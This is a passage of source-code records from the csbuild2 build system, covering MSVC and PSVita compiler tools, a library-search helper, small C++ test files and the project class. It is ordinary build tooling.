self._getUwpArgs(project, isCpp) \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ [inputFile.filename]\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [self._exePath, \"@{}\".format(responseFile.filePath)]\n\n\tdef SetupForProject(self, project):\n\t\tMsvcToolBase.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\t\tself._exePath = os.path.join(self.vcvarsall.binPath, \"cl.exe\")\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self):\n\t\targs = [\"/nologo\", \"/c\", \"/Oi\", \"/GS\"]\n\t\tif self._optLevel == OptimizationLevel.Disabled:\n\t\t\targs.append(\"/RTC1\")\n\t\treturn args\n\n\tdef _getCustomArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn self._globalFlags + self._cxxFlags if isCpp else self._cFlags\n\n\tdef _getDebugArgs(self):\n\t\targ = {\n\t\t\tDebugLevel.EmbeddedSymbols: \"/Z7\",\n\t\t\tDebugLevel.ExternalSymbols: \"/Zi\",\n\t\t\tDebugLevel.ExternalSymbolsPlus: \"/ZI\",\n\t\t}\n\t\treturn [arg.get(self._debugLevel, \"\")]\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: 
\"/O1\",\n\t\t\tOptimizationLevel.Speed: \"/O2\",\n\t\t\tOptimizationLevel.Max: \"/Ox\",\n\t\t}\n\t\treturn [arg.get(self._optLevel, \"/Od\")]\n\n\tdef _getRuntimeLinkageArgs(self):\n\t\targ = \"/{}{}\".format(\n\t\t\t\"MT\" if self._staticRuntime else \"MD\",\n\t\t\t\"d\" if self._debugRuntime else \"\"\n\t\t)\n\t\treturn [arg]\n\n\tdef _getPreprocessorArgs(self):\n\t\tdefineArgs = [\"/D{}\".format(d) for d in self._defines]\n\t\tundefineArgs = [\"/U{}\".format(u) for u in self._undefines]\n\t\treturn defineArgs + undefineArgs\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"/I{}\".format(directory) for directory in self._includeDirectories]\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\targs = [\"/Fo{}\".format(filePath) for filePath in outputFiles if os.path.splitext(filePath)[1] in [\".obj\"]]\n\n\t\tif self._debugLevel in [DebugLevel.ExternalSymbols, DebugLevel.ExternalSymbolsPlus]:\n\t\t\targs.extend([\"/Fd{}\".format(filePath) for filePath in outputFiles if os.path.splitext(filePath)[1] in [\".pdb\"]])\n\n\t\treturn args\n\n\tdef _getLanguageStandardArgs(self):\n\t\t# No argument for the C language standard.\n\t\targ = \"/std:{}\".format(self._cxxStandard) if self._cxxStandard else None\n\t\treturn [arg]\n\n\tdef _getUwpArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\t_ignore(isCpp)\n\t\treturn []\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5517241358757019, "avg_line_length": 6, "blob_id": "b2f0bd18a3a37a543f5af822150ce48ad5226641", "content_id": "ae2bc42e0cc74f1d2d0f3b91bb525d660ae2c5b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 29, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/functional_tests/explicit_sources_test/project/source/correct/getnum.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\nint getnum()\n{\n\treturn 4;\n}\n" }, { "alpha_fraction": 0.7350475192070007, "alphanum_fraction": 0.736165463924408, "avg_line_length": 35.141414642333984, "blob_id": "66de89f096738dc10df742a23f8dc71983a325c5", "content_id": "0cb8ded4966c0ea5a2998c8b4c51b6d47a33e7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3578, "license_type": "no_license", "max_line_length": 102, "num_lines": 99, "path": "/csbuild/tools/common/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: common\n\t:synopsis: Abstract tools and functions that can be shared between other tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\n# Required to keep lint happy.\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom csbuild import log\n\ndef FindLibraries(libNames, libDirs, libExts):\n\t\"\"\"\n\tHelper function to explicitly search for libraries. This is needed by linker tools that cannot run a\n\tspecific executable for this.\n\n\t:param libNames: Library names to search for.\n\t:type libNames: list[str]\n\n\t:param libDirs: Library directories to search in.\n\t:type libDirs: list[str]\n\n\t:param libExts: File extensions (in priority order) to use in combination with library names.\n\t:type libExts: list[str]\n\n\t:return: Dictionary of library names to their full paths.\n\t:rtype: dict[str, str] or None\n\t\"\"\"\n\tnotFound = set()\n\tfound = {}\n\n\tdef _searchForLib(libraryName, libraryDir, libExt):\n\t\t# Add the extension if it's not already there.\n\t\tfilename = \"{}{}\".format(libraryName, libExt) if not libraryName.endswith(libExt) else libraryName\n\n\t\t# Try searching for the library name as it is.\n\t\tlog.Info(\"Looking for library {} in directory {}...\".format(filename, libraryDir))\n\t\tfullPath = os.path.join(libraryDir, filename)\n\n\t\t# Check if the file exists at the current path.\n\t\tif os.access(fullPath, os.F_OK):\n\t\t\treturn fullPath\n\n\t\t# If the library couldn't be found, simulate posix by adding the \"lib\" prefix.\n\t\tfilename = \"lib{}\".format(filename)\n\n\t\tlog.Info(\"Looking for library {} in directory {}...\".format(filename, libraryDir))\n\t\tfullLibraryPath = os.path.join(libraryDir, filename)\n\n\t\t# Check if the modified filename exists at the current path.\n\t\tif os.access(fullLibraryPath, os.F_OK):\n\t\t\treturn fullLibraryPath\n\n\t\treturn None\n\n\tfor libraryName in libNames:\n\t\tif os.access(libraryName, os.F_OK):\n\t\t\tabspath = os.path.abspath(libraryName)\n\t\t\tlog.Info(\"... found {}\".format(abspath))\n\t\t\tfound[libraryName] = abspath\n\t\telse:\n\t\t\tfor libraryExt in libExts:\n\t\t\t\tfor libraryDir in libDirs:\n\t\t\t\t\t# Search for the library with the current extension.\n\t\t\t\t\tfullPath = _searchForLib(libraryName, libraryDir, libraryExt)\n\t\t\t\t\tif fullPath:\n\t\t\t\t\t\tlog.Info(\"... 
found {}\".format(fullPath))\n\t\t\t\t\t\tfound[libraryName] = fullPath\n\t\t\t\t\t\tbreak\n\n\t\t\tif libraryName not in found:\n\t\t\t\t# Failed to find the library in any of the provided directories.\n\t\t\t\tlog.Error(\"Failed to find library \\\"{}\\\".\".format(libraryName))\n\t\t\t\tnotFound.add(libraryName)\n\n\treturn None if notFound else found\n" }, { "alpha_fraction": 0.7234848737716675, "alphanum_fraction": 0.7310606241226196, "avg_line_length": 16.600000381469727, "blob_id": "f62f8954a8cff5bc491c19629c00348911eaaee9", "content_id": "e5465cc87ea8b74f4f4fc7947fe406f0cfe1e10b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 264, "license_type": "no_license", "max_line_length": 38, "num_lines": 15, "path": "/functional_tests/basic_cpp_test/libhello/libhello.hpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n\n#ifdef _WIN32\n#\tif defined(CSB_TARGET_STATIC)\n#\t\tdefine EXPORT\n#\telif defined(CSB_SHARED_LIBRARY)\n#\t\tdefine EXPORT __declspec(dllexport)\n#\telse\n#\t\tdefine EXPORT __declspec(dllimport)\n#\tendif\n#else\n#\tdefine EXPORT\n#endif\n\nEXPORT void goodbye_world();\n" }, { "alpha_fraction": 0.663802981376648, "alphanum_fraction": 0.6655212044715881, "avg_line_length": 34.876712799072266, "blob_id": "b52495be122352f4c435209aea6580d565093545", "content_id": "d69c983998cb9abed2efbbf3c742ac0c0df47d9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5238, "license_type": "no_license", "max_line_length": 121, "num_lines": 146, "path": "/csbuild/tools/cpp_compilers/psvita_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: psvita_cpp_compiler\n\t:synopsis: Implementation of the PSVita C/C++ compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\n\nfrom ..common.sony_tool_base import PsVitaBaseTool\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... 
import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\nclass PsVitaCppCompiler(PsVitaBaseTool, CppCompilerBase):\n\t\"\"\"\n\tPSVita C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"arm\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPsVitaBaseTool.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPsVitaBaseTool.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName()\n\t\tcmd = self._getCustomArgs(isCpp) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2snc.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getCustomArgs(self, isCpp):\n\t\treturn self._globalFlags + (self._cxxFlags if isCpp else self._cFlags)\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self):\n\t\targs = []\n\t\targs.extend([\"-D{}\".format(d) for d in self._defines])\n\t\targs.extend([\"-U{}\".format(u) for u in self._undefines])\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = []\n\n\t\tfor dirPath in self._includeDirectories:\n\t\t\targs.extend([\n\t\t\t\t\"-I{}\".format(os.path.abspath(dirPath)),\n\t\t\t])\n\n\t\t# Add the PSVita system include directories.\n\t\targs.extend([\n\t\t\t\"-I{}\".format(os.path.join(self._psVitaSdkPath, \"target\", \"include\")),\n\t\t\t\"-I{}\".format(os.path.join(self._psVitaSdkPath, \"target\", \"include_common\")),\n\t\t])\n\n\t\treturn args\n\n\tdef 
_getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"d\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\t# No argument for the C language standard.\n\t\targ = \"-Xstd={}\".format(self._cxxStandard) if self._cxxStandard and isSourceCpp else None\n\t\treturn [arg] if arg else []\n" }, { "alpha_fraction": 0.7255929708480835, "alphanum_fraction": 0.7261171340942383, "avg_line_length": 36.68395233154297, "blob_id": "daf53fc909e2070398c91a29178a7b734d467a51", "content_id": "96dd2a1cd39d63b535527a486056753fcb3c9cdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15262, "license_type": "no_license", "max_line_length": 198, "num_lines": 405, "path": "/csbuild/_build/project.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: project\n\t:synopsis: A project that's been finalized for building.\n\t\tUnlike ProjectPlan, Project is a completely finalized class specialized on a single toolchain, and is ready to build\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport collections\nimport threading\n\nimport csbuild\nfrom .. import log, perf_timer\nfrom .._utils import ordered_set, shared_globals, StrType, BytesType, PlatformString, PlatformUnicode\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._build import input_file\nfrom ..toolchain.toolchain import Toolchain\n\nclass UserData(object):\n\t\"\"\"\n\tWrapper around a dict that allows its contents to be accessed as if they were class properties instead of dict keys\n\t:param dataDict: dict to wrap\n\t:type dataDict: dict\n\t\"\"\"\n\tdef __init__(self, dataDict):\n\t\tself.dataDict = dataDict\n\n\tdef __getattr__(self, item):\n\t\treturn object.__getattribute__(self, \"dataDict\")[item]\n\n\tdef __contains__(self, item):\n\t\treturn item in self.dataDict\n\nclass Project(object):\n\t\"\"\"\n\tA finalized, concrete project\n\n\t:param name: The project's name. 
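# ---- Illustrative aside (not part of the source record above) ----
# A minimal sketch of how the UserData wrapper defined above behaves,
# assuming it is importable from csbuild._build.project; the keys and
# values here are hypothetical.
from csbuild._build.project import UserData

userData = UserData({"platform": "win64", "vendor": "hypothetical"})
assert userData.platform == "win64"  # dict keys read back as attributes
assert "vendor" in userData          # __contains__ consults the wrapped dict
# ---- End aside ----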
Must be unique.\n\t:type name: str\n\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t:type workingDirectory: String\n\t:param depends: List of names of other projects this one depends on.\n\t:type depends: list(String)\n\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t:type priority: int\n\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t:type ignoreDependencyOrdering: bool\n\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t:type autoDiscoverSourceFiles: bool\n\t:param autoResolveRpaths: Automatically add RPATH arguments for linked shared libraries.\n\t:type autoResolveRpaths: bool\n\t:param projectSettings: Finalized settings from the project plan\n\t:type projectSettings: dict\n\t:param toolchainName: Toolchain name\n\t:type toolchainName: str, bytes\n\t:param archName: Architecture name\n\t:type archName: str, bytes\n\t:param targetName: Target name\n\t:type targetName: str, bytes\n\t:param scriptDir: Directory of the script where this project is defined\n\t:type scriptDir: str, bytes\n\t\"\"\"\n\n\t_lock = threading.Lock()\n\n\tdef __init__(self, name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles, autoResolveRpaths, projectSettings, toolchainName, archName, targetName, scriptDir):\n\t\twith perf_timer.PerfTimer(\"Project init\"):\n\n\t\t\tself.name = name\n\t\t\tself.workingDirectory = workingDirectory\n\t\t\tself.dependencyNames = depends\n\t\t\tself.dependencies = []\n\t\t\tself.priority = priority\n\t\t\tself.ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\t\tself.autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\t\tself.autoResolveRpaths = autoResolveRpaths\n\n\t\t\tself.toolchainName = toolchainName\n\t\t\tself.architectureName = archName\n\t\t\tself.targetName = targetName\n\n\t\t\tself.scriptDir = scriptDir\n\n\t\t\t#: type: dict[str, set[str]]\n\t\t\tself.builtThisRun = {}\n\n\t\t\tlog.Build(\"Preparing build tasks for {}\", self)\n\n\t\t\t#: type: set[Tool]\n\t\t\tself.tools = projectSettings[\"tools\"] - projectSettings.get(\"disabledTools\", set())\n\t\t\tself.checkers = projectSettings.get(\"checkers\", {})\n\n\t\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\ttools = []\n\t\t\t\tgeneratorTools = shared_globals.allGenerators[shared_globals.solutionGeneratorType].projectTools\n\t\t\t\tfor tool in self.tools:\n\t\t\t\t\tif tool in generatorTools:\n\t\t\t\t\t\ttools.append(tool)\n\t\t\t\tself.tools = tools\n\n\t\t\tself.userData = UserData(projectSettings.get(\"_userData\", {}))\n\n\t\t\tdef _convertSet(toConvert):\n\t\t\t\tret = toConvert.__class__()\n\t\t\t\tfor item in toConvert:\n\t\t\t\t\tret.add(_convertItem(item))\n\t\t\t\treturn ret\n\n\t\t\tdef _convertDict(toConvert):\n\t\t\t\tfor key, val in toConvert.items():\n\t\t\t\t\ttoConvert[key] = _convertItem(val)\n\t\t\t\treturn toConvert\n\n\t\t\tdef _convertList(toConvert):\n\t\t\t\tfor i, item in enumerate(toConvert):\n\t\t\t\t\ttoConvert[i] = _convertItem(item)\n\t\t\t\treturn toConvert\n\n\t\t\tdef _convertItem(toConvert):\n\t\t\t\tif isinstance(toConvert, 
list):\n\t\t\t\t\treturn _convertList(toConvert)\n\t\t\t\tif isinstance(toConvert, (dict, collections.OrderedDict)):\n\t\t\t\t\treturn _convertDict(toConvert)\n\t\t\t\tif isinstance(toConvert, (set, ordered_set.OrderedSet)):\n\t\t\t\t\treturn _convertSet(toConvert)\n\t\t\t\tif isinstance(toConvert, (StrType, BytesType)):\n\t\t\t\t\treturn self.FormatMacro(toConvert)\n\t\t\t\treturn toConvert\n\n\t\t\twith perf_timer.PerfTimer(\"Macro formatting\"):\n\t\t\t\t# We set self.settings here because _convertItem calls FormatMacro and FormatMacro uses self.settings\n\t\t\t\tself.settings = projectSettings\n\t\t\t\tself.settings = _convertItem(projectSettings)\n\n\t\t\tself.toolchain = Toolchain(self.settings, *self.tools, checkers=self.checkers)\n\n\t\t\tself.projectType = self.settings.get(\"projectType\", csbuild.ProjectType.Application)\n\n\t\t\t#: type: set[str]\n\t\t\tself.excludeFiles = self.settings.get(\"excludeFiles\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.excludeDirs = self.settings.get(\"excludeDirs\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.sourceFiles = self.settings.get(\"sourceFiles\", set())\n\t\t\t#: type: set[str]\n\t\t\tself.sourceDirs = self.settings.get(\"sourceDirs\", set())\n\n\t\t\t#: type: str\n\t\t\tself.intermediateDir = os.path.join(\n\t\t\t\tself.scriptDir,\n\t\t\t\tself.settings.get(\n\t\t\t\t\t\"intermediateDir\",\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\"intermediate\",\n\t\t\t\t\t\tself.toolchainName,\n\t\t\t\t\t\tself.architectureName,\n\t\t\t\t\t\tself.targetName,\n\t\t\t\t\t\tself.name\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\n\t\t\t#: type: str\n\t\t\tself.outputDir = os.path.join(\n\t\t\t\tself.scriptDir,\n\t\t\t\tself.settings.get(\n\t\t\t\t\t\"outputDir\",\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\t\"out\",\n\t\t\t\t\t\tself.toolchainName,\n\t\t\t\t\t\tself.architectureName,\n\t\t\t\t\t\tself.targetName,\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\n\t\t\t#: type: str\n\t\t\tself.csbuildDir = os.path.join(self.scriptDir, \".csbuild\")\n\n\t\t\tif not os.access(self.csbuildDir, os.F_OK):\n\t\t\t\tos.makedirs(self.csbuildDir)\n\n\t\t\tself.lastRunArtifacts = shared_globals.settings.Get(repr(self)+\".artifacts\", collections.OrderedDict())\n\n\t\t\tself.artifacts = collections.OrderedDict()\n\n\t\t\tself.outputName = self.settings.get(\"outputName\", self.name)\n\n\t\t\t# Stub projects will not be built, so they don't need intermediate or output directories.\n\t\t\tif self.projectType != csbuild.ProjectType.Stub:\n\t\t\t\tif not os.access(self.intermediateDir, os.F_OK):\n\t\t\t\t\tos.makedirs(self.intermediateDir)\n\t\t\t\tif not os.access(self.outputDir, os.F_OK):\n\t\t\t\t\tos.makedirs(self.outputDir)\n\n\t\t\t#: type: dict[str, set[csbuild._build.input_file.InputFile]]\n\t\t\tself.inputFiles = {}\n\n\t\t\tself.RediscoverFiles()\n\n\tdef __repr__(self):\n\t\treturn \"{} ({}-{}-{})\".format(self.name, self.toolchainName, self.architectureName, self.targetName)\n\n\tdef FormatMacro(self, toConvert):\n\t\t\"\"\"\n\t\tFormat a string containing macros with data from the project.\n\t\te.g., in a project with toolchainName = msvc, FormatMacro(\"{toolchainName}.foo\") would return \"msvc.foo\"\n\t\tThis will also convert any values of type unicode (in python2) or bytes (in python3) to the platform-appropriate\n\t\tstr type.\n\n\t\t:param toConvert: The macroized string to convert\n\t\t:type toConvert: str, bytes\n\t\t:return: The converted string\n\t\t:rtype: str\n\t\t\"\"\"\n\t\t# TODO: This could be optimized:\n\t\t# Make a proxy class that gets items from the list of valid 
items\n\t\t# and convert them as we come across them, using memoization to avoid redundant\n\t\t# conversions. If we do that, we could do each string in one pass.\n\t\tif \"{\" in toConvert:\n\t\t\tprev = \"\"\n\t\t\twhile toConvert != prev:\n\t\t\t\tlog.Info(\"Formatting {}\", toConvert)\n\t\t\t\tprev = toConvert\n\t\t\t\ttoConvert = toConvert.format(\n\t\t\t\t\tname=self.name,\n\t\t\t\t\tworkingDirectory=self.workingDirectory,\n\t\t\t\t\tdependencyNames=self.dependencyNames,\n\t\t\t\t\tpriority=self.priority,\n\t\t\t\t\tignoreDependencyOrdering=self.ignoreDependencyOrdering,\n\t\t\t\t\tautoDiscoverSourceFiles=self.autoDiscoverSourceFiles,\n\t\t\t\t\tsettings=self.settings,\n\t\t\t\t\ttoolchainName=self.toolchainName,\n\t\t\t\t\tarchitectureName=self.architectureName,\n\t\t\t\t\ttargetName=self.targetName,\n\t\t\t\t\tuserData=self.userData,\n\t\t\t\t\t**self.settings\n\t\t\t\t)\n\t\t\t\tlog.Info(\" => {}\", toConvert)\n\t\treturn PlatformString(toConvert)\n\n\tdef ResolveDependencies(self):\n\t\t\"\"\"\n\t\tCalled after shared_globals.projectMap is filled out, this will populate the dependencies map.\n\t\t\"\"\"\n\t\tfor name in self.dependencyNames:\n\t\t\tself.dependencies.append(shared_globals.projectMap[self.toolchainName][self.architectureName][self.targetName][name])\n\n\t@TypeChecked(inputs=(input_file.InputFile, list, ordered_set.OrderedSet, type(None)), artifact=String)\n\tdef AddArtifact(self, inputs, artifact):\n\t\t\"\"\"\n\t\tAdd an artifact - i.e., a file created by the build\n\t\t:param inputs: Inputs being used to generate this artifact\n\t\t:type inputs: input_file.InputFile or list[input_file.InputFile] or ordered_set.OrderedSet[input_file.InputFile]\n\t\t:param artifact: absolute path to the file\n\t\t:type artifact: str\n\t\t\"\"\"\n\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\tif artifact not in self.artifacts.get(inputs, {}):\n\t\t\t\tself.artifacts.setdefault(inputs, ordered_set.OrderedSet()).add(artifact)\n\t\t\treturn\n\n\t\tif inputs is not None:\n\t\t\tif isinstance(inputs, input_file.InputFile):\n\t\t\t\tinputs = [inputs]\n\t\t\tinputs = tuple(sorted(i.filename for i in inputs))\n\t\tif artifact not in self.artifacts.get(inputs, {}):\n\t\t\tself.artifacts.setdefault(inputs, ordered_set.OrderedSet()).add(artifact)\n\t\t\tshared_globals.settings.Save(repr(self)+\".artifacts\", self.artifacts)\n\n\t@TypeChecked(inputs=(input_file.InputFile, list, ordered_set.OrderedSet))\n\tdef GetLastResult(self, inputs):\n\t\t\"\"\"\n\t\tGet the list of files that were created from a set of inputs in the last run.\n\n\t\t:param inputs: The input or inputs being used for this compile unit.\n\t\t:type inputs: input_file.InputFile or list[input_file.InputFile] or ordered_set.OrderedSet[input_file.InputFile]\n\t\t:return: The list of outputs from the last run\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\tif isinstance(inputs, input_file.InputFile):\n\t\t\tinputs = [inputs]\n\t\tinputs = tuple(sorted(i.filename for i in inputs))\n\t\treturn self.lastRunArtifacts.get(inputs, None)\n\n\tdef ClearArtifacts(self):\n\t\t\"\"\"Remove the artifacts for this project from the settings\"\"\"\n\t\tshared_globals.settings.Delete(repr(self)+\".artifacts\")\n\n\t@TypeChecked(inputFile=input_file.InputFile, _return=StrType)\n\tdef GetIntermediateDirectory(self, inputFile):\n\t\t\"\"\"\n\t\tGet the unique, intermediate directory path for an input file. 
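# ---- Illustrative aside (not part of the source record above) ----
# FormatMacro above expands "{...}" placeholders repeatedly until the string
# stops changing, so a macro's value may itself contain more macros. A
# self-contained sketch of that fixed-point loop, with hypothetical values:
def expandMacros(text, macros):
	prev = None
	while text != prev:  # keep formatting until nothing changes
		prev = text
		text = text.format(**macros)
	return text

assert expandMacros("{toolchainName}.foo", {"toolchainName": "msvc"}) == "msvc.foo"
assert expandMacros("{a}", {"a": "{b}", "b": "done"}) == "done"  # nested macro
# ---- End aside ----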
